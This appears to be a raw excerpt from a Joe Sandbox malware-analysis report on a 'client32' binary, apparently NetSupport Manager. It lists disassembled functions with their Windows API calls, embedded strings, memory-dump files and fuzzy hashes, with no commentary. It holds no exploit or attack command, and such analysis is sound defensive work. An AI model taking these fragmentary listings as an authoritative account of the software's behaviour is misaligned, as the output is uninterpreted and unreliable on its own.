                                                                                        • GetSubMenu.USER32(?,00000000,?,?), ref: 11143848
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 11143869
                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 11143872
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 1114387C
                                                                                        • DeleteMenu.USER32 ref: 11143892
                                                                                        • GetMenuItemID.USER32(?,00000001), ref: 1114389A
                                                                                        • DeleteMenu.USER32 ref: 111438B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$Delete$Count
                                                                                        • String ID:
                                                                                        • API String ID: 1985338998-0
                                                                                        • Opcode ID: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                        • Instruction ID: 1fd4eba2895a352ce9ef292ca712417bb50dbed27225d5083b87c16346d81a74
                                                                                        • Opcode Fuzzy Hash: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                        • Instruction Fuzzy Hash: 7611817181422BBBF7059B60CDC8AAFF7BCEF45A19F204229F92592440E7749544CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                          • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                        • GetParent.USER32(00000000), ref: 11089996
                                                                                        • GetParent.USER32(00000000), ref: 110899A7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ParentWindow
                                                                                        • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                        • API String ID: 3530579756-3361795001
                                                                                        • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                        • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                        • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                        • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                        APIs
                                                                                          • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,B24479DC,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 1101B776
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                        • LoadLibraryA.KERNEL32(NSSecurity.dll), ref: 1101B7AE
                                                                                          • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                        Strings
                                                                                        • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                        • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                        • NSSecurity.dll, xrefs: 1101B7A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                        • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                        • API String ID: 3515807602-1044166025
                                                                                        • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                        • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                        • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                        • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                        APIs
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 11005C19
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 11005C5F
                                                                                        • InvalidateRect.USER32(00000000,?,00000001), ref: 11005CDA
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetDC.USER32(00000000), ref: 11005D08
                                                                                          • Part of subcall function 110027F0: SetROP2.GDI32(?,00000007), ref: 11002807
                                                                                          • Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100281A
                                                                                          • Part of subcall function 110027F0: GetStockObject.GDI32(00000005), ref: 11002821
                                                                                          • Part of subcall function 110027F0: SelectObject.GDI32(?,00000000), ref: 11002829
                                                                                          • Part of subcall function 110027F0: Ellipse.GDI32(?,?,?,?,?), ref: 11002847
                                                                                          • Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100285A
                                                                                          • Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 11002861
                                                                                          • Part of subcall function 110027F0: SetROP2.GDI32(?,?), ref: 11002868
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Object$Select$EllipseErrorExitInvalidateLastMessageModeProcessRectReleaseStockwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2286382378-2830328467
                                                                                        • Opcode ID: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
                                                                                        • Instruction ID: e9a3d4a4942fbb4b58af945c8767c34c1742e1c8abd3ae03a76f14add5a4435e
                                                                                        • Opcode Fuzzy Hash: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
                                                                                        • Instruction Fuzzy Hash: 286137B5A00B069FE764CF69C884BD7B7E5BF89354F10892EE5AE87240DB71B840CB51
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Closewsprintf
                                                                                        • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                        • API String ID: 4060989581-4096285074
                                                                                        • Opcode ID: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                        • Instruction ID: f393627671fb017ea66c5cc56c7c64c93c0c73457dc74dc6be4a09c67f558207
                                                                                        • Opcode Fuzzy Hash: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
                                                                                        • Instruction Fuzzy Hash: F14106B5E006699BD725CB64CC80FEEB3B8EF45308F1045E8EA5997680EB31AE44CF55
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Closewsprintf
                                                                                        • String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
                                                                                        • API String ID: 4060989581-4096285074
                                                                                        • Opcode ID: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                        • Instruction ID: 0c1333cb51f3e687940ac8a863b18b978c2e00f876245ba0d4622cc4c938ac8c
                                                                                        • Opcode Fuzzy Hash: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
                                                                                        • Instruction Fuzzy Hash: 1B4106B5E006699BD715CB64CC80FEEB3B8EF45308F1045E8EA5997280EB31AE44CF55
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32 ref: 110ED801
                                                                                        • _free.LIBCMT ref: 110ED81C
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _malloc.LIBCMT ref: 110ED82E
                                                                                        • RegQueryValueExA.ADVAPI32 ref: 110ED85A
                                                                                        • _free.LIBCMT ref: 110ED8E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                        • String ID: Error %d getting %s
                                                                                        • API String ID: 582965682-2709163689
                                                                                        • Opcode ID: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                        • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                        • Opcode Fuzzy Hash: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                        • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                          • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                          • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                          • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                                        • _memmove.LIBCMT ref: 1100FA4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                        • String ID: invalid string position$string too long
                                                                                        • API String ID: 443534600-4289949731
                                                                                        • Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                        • Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
                                                                                        • Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                        • Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792
                                                                                        APIs
                                                                                          • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                          • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
                                                                                          • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                        • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                        • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                        • IsWindow.USER32(?), ref: 1103D17E
                                                                                        • SendMessageA.USER32(?,0000004A,0001033C,00000492), ref: 1103D1B8
                                                                                        • _free.LIBCMT ref: 1103D1BF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                        • String ID: Show16
                                                                                        • API String ID: 625148989-2844191965
                                                                                        • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                        • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                        • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                        • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                        APIs
                                                                                          • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                        • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                        • IsA(), xrefs: 1100968D, 110096B5
                                                                                        • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                        • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
